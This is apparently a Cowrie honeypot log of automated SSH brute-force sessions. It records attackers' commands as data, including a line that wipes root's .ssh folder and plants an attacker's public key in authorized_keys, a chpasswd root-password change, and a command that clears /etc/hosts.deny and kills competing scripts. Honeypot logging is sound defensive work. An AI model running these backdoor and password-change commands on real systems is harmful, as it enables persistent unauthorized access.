{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:52:23.318117Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:23.319170Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36576,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f53a367c7ba","protocol":"ssh","message":"New connection: 212.227.235.229:36576 (1.2.3.4:22) [session: 0f53a367c7ba]","sensor":"my-vps","timestamp":"2025-08-26T03:52:23.562037Z"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:23.951094Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:24.513032Z","src_ip":"212.227.235.229","session":"0f53a367c7ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:24.513699Z","src_ip":"212.227.235.229","session":"0f53a367c7ba"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:25.503967Z","src_ip":"212.227.235.229","session":"0f53a367c7ba"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:26.753911Z","src_ip":"212.227.235.229","session":"0f53a367c7ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57732,"dst_ip":"1.2.3.4","dst_port":22,"session":"3738b7ed56fc","protocol":"ssh","message":"New connection: 212.227.235.229:57732 (1.2.3.4:22) [session: 3738b7ed56fc]","sensor":"my-vps","timestamp":"2025-08-26T03:52:26.999207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:26.999930Z","src_ip":"212.227.235.229","session":"3738b7ed56fc"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":56770,"dst_ip":"1.2.3.4","dst_port":22,"session":"21c42a2d31ee","protocol":"ssh","message":"New connection: 68.183.87.241:56770 (1.2.3.4:22) [session: 21c42a2d31ee]","sensor":"my-vps","timestamp":"2025-08-26T03:52:31.807749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:31.809576Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:32.084517Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:33.042897Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.043624Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.closed","duration":13.47185754776001,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.064608Z","src_ip":"212.227.235.229","session":"89882625453a"}
{"eventid":"cowrie.login.success","username":"root","password":"root#123456","message":"login attempt [root/root#123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.225589Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.305343Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45425,"dst_ip":"1.2.3.4","dst_port":23,"session":"5296cdc34e60","protocol":"telnet","message":"New connection: 212.227.235.229:45425 (1.2.3.4:23) [session: 5296cdc34e60]","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.323365Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:33.826898Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.827581Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.828552Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:33.933549Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"echo \"root:ugvAW0qSTFVM\"|chpasswd|bash","message":"CMD: echo \"root:ugvAW0qSTFVM\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T03:52:33.934251Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:34.104419Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/34f42105ff63da35b581ccd8643f37e9840d5bd93d5c659bc8bdaff8a9522279","size":21,"shasum":"34f42105ff63da35b581ccd8643f37e9840d5bd93d5c659bc8bdaff8a9522279","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/34f42105ff63da35b581ccd8643f37e9840d5bd93d5c659bc8bdaff8a9522279 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:34.195466Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:34.674741Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:52:34.675495Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:34.813993Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T03:52:34.814741Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:52:34.952317Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:34.953167Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.078985Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.079892Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":53712,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d53a4422b30","protocol":"ssh","message":"New connection: 68.183.87.241:53712 (1.2.3.4:22) [session: 1d53a4422b30]","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.213800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.214580Z","src_ip":"68.183.87.241","session":"1d53a4422b30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.472748Z","src_ip":"68.183.87.241","session":"1d53a4422b30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:35.677969Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.678650Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:35.939864Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:36.473444Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T03:52:36.474124Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:36.545743Z","src_ip":"68.183.87.241","session":"1d53a4422b30"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":27,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:36.736081Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:37.846541Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T03:52:37.847496Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T03:52:37.848449Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:37.853441Z","src_ip":"68.183.87.241","session":"1d53a4422b30"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":53720,"dst_ip":"1.2.3.4","dst_port":22,"session":"f491a6a7624c","protocol":"ssh","message":"New connection: 68.183.87.241:53720 (1.2.3.4:22) [session: f491a6a7624c]","sensor":"my-vps","timestamp":"2025-08-26T03:52:38.053463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:38.054636Z","src_ip":"68.183.87.241","session":"f491a6a7624c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:38.111425Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:38.308890Z","src_ip":"68.183.87.241","session":"f491a6a7624c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:38.645495Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T03:52:38.646239Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:38.906247Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:52:39.364154Z","src_ip":"68.183.87.241","session":"f491a6a7624c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:39.528995Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T03:52:39.529816Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:39.619134Z","src_ip":"68.183.87.241","session":"f491a6a7624c"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:39.620126Z","src_ip":"68.183.87.241","session":"21c42a2d31ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:39.790601Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:40.376162Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T03:52:40.376998Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:40.637228Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:41.183311Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T03:52:41.184272Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
